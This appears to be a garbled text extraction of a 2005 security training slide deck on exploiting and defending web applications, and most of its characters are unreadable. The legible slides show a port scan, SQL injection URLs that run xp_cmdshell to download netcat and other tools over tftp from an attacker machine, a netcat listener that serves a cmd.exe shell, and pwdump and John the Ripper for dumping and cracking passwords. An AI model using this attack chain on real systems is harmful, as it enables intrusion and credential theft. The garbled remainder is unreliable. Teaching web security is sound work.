exploiting and defending web applications

1

��

��

Securitycompass.comShowcase Ontario 2005

��

�� !��"#��$�%��%&

'��#��(#��$�%��

) *��+,��

) - ��*��. ��(��/��-��-��0��#��-��-��.��#��1�

) #��.-2��$��--��3�4�� -��5��-3#$6#��-$��7��'��(��8��

) ��%��9�� #��$�%��

) ��%��:,,��

2


)��


4��$�%��

3


��5��

) #�� #��#��

� 3��#��#��

� $��5��%��

) �� 3��%��;��

� 3��

� ��

� ��<��

� #��%��%��

� $��

� ��%��%��


��=�5��> ��

) 3��%��;�� #��#��(;��%��

) 3��'�� (��(��?��

� $��(;�4@�*#4��%��

) �� (��

) ��<�� %��%��

4


��=�5��

) #��5��%��

) $�� %��%��

) ��5��%��

) ��3��3��%�� %��


��A

) #��

� 3��#��#��

) ��

� ��

� ��<��

� ��5��%��

� 3��'��

5


) ��=�5��> #��

) ��#��

) 3��

) #��


��#��

) ��#��sl -bhpvt 25,53,80,443,3389,100-200 192.168.15.110

9��

��

+B6�+CD�+:�CE��

��

��

��

��

6


3��4��#��F��G


#��4��#��

�� F$�%%��G(;�7#��H��%F;I3G(��%%��

J�� H��%H �� +�K:@+�KLH ��M4��3�.+B6�+CD�+:�++,M4��%�.��%M4��.D,M#��4�%�.9��6C+D.:D.:D6,,:HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH #��-#��-��(��H��M#��.5��H33#@C�,H 2��0H��H ��.�#��4M*#' HCK,.33#%��3��7�� N��@�%��4��

��-��.@@+B6�+CD�+:�++,@�%��@-�$��H6,,,H,CLB�M��44�5��.*�43*�#(42�$�(;�4(�� M�44�%��O42�$�O��3��*#' HDEE�

7


) ��=�5��> ��

) ��

) ��@ ��

) ��<��

) 3��'��


��

8


��@ ��

) 7��A

� ��%�

� #��%�

� 3 ��%��

) ��%��%�F��G

) #��%�F��%��AG

) 3 ��%��F�%��3 ��%��G

��


��@ ��

) ��3��%��%A

� �%��7��

) #��%�

� �%��7��

) 3 ��%��

� ;��F+��+,,(��%��G

9


��<��

) 7��%�

) #��%��%��%��F��G

) 7��

) ��%��

@��%��A��P%��/��P+6

) 5��PQ+��+,,R


��<��$��

) $��3��%��A

) @��%��A��P��%��/��P��/��P%��S��S��

) $��%��

��

10


��5��%��

) I��

) I��%��

) I��%��

) '��


3��'��> #T73�?��

) #T7��?��N��H��(��#T7��%%��

) ��%��%%�� %��F��S�%��G

T&��S�%�� A

�& ��S�%�� %��%%��5��#T7#��

11


3��'��> #T73�?��$��

) #T73�?��F��%%��G) exec master..xp_cmdshell 'tftp -i 192.168.15.67 GET

nc.exe'--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'tftp -i 192.168.15.67 GET nc.exe'--]

) exec master..xp_cmdshell 'tftp -i 192.168.15.67 GET toolz.exe c:\toolz.exe'--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'tftp -i 192.168.15.67 GET toolz.exe c:\toolz.exe'--]

) exec master..xp_cmdshell 'nc -v -l -p 443 -e cmd.exe’--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'nc%20-v%20-l%20-p%20443%20-e%20cmd.exe'--]


��A

$��%��%��

nc –vvn 192.168.15.110 443

) ��3��

ipconfig /all [identify ip address]

whoami [identify account name]

tasklist /svc [services running]

) �%��

pwdump3e [dump account passwords]

tasklist /svc [services running]

12


$��

) �%��7 ��

Pwdump3e \\localhost

) $��

L0phtcrack or John


'��%��%��

13


T��

��F��G��$�%��%

'��

��#��$�%��$�%

$��I�


#��$�%��$�%

) 9��6,,L

) $��%��.� 9��+,,,��

� 9��#��(3��(#��'��

) $��.� #��$�%��N��%��#��%��%��%��%��%��

14


#��

) ��#��.� $��

� ��

) $��.� #��%��@��4��

� �$�%%��#��%��

� ��#��%��

� #��3��%��

� ��4��


��

) #��$��.��*�K��L ��$��

� ��

� 7��<��%��

� ��

� 7��%��H��%%��

� �� !��"

� 7��

� ��!��#�� !��"�� $��

� ��%��

15


$�%��$��

) #��$�%��%��9��(7��(#��U��

) #��$�%��%��%��

) *��

F2��$��(��3�4�� (3#$6#��7�� $��(#��*��6,,:G

$�%��$��

exploiting and defending web applications

Technology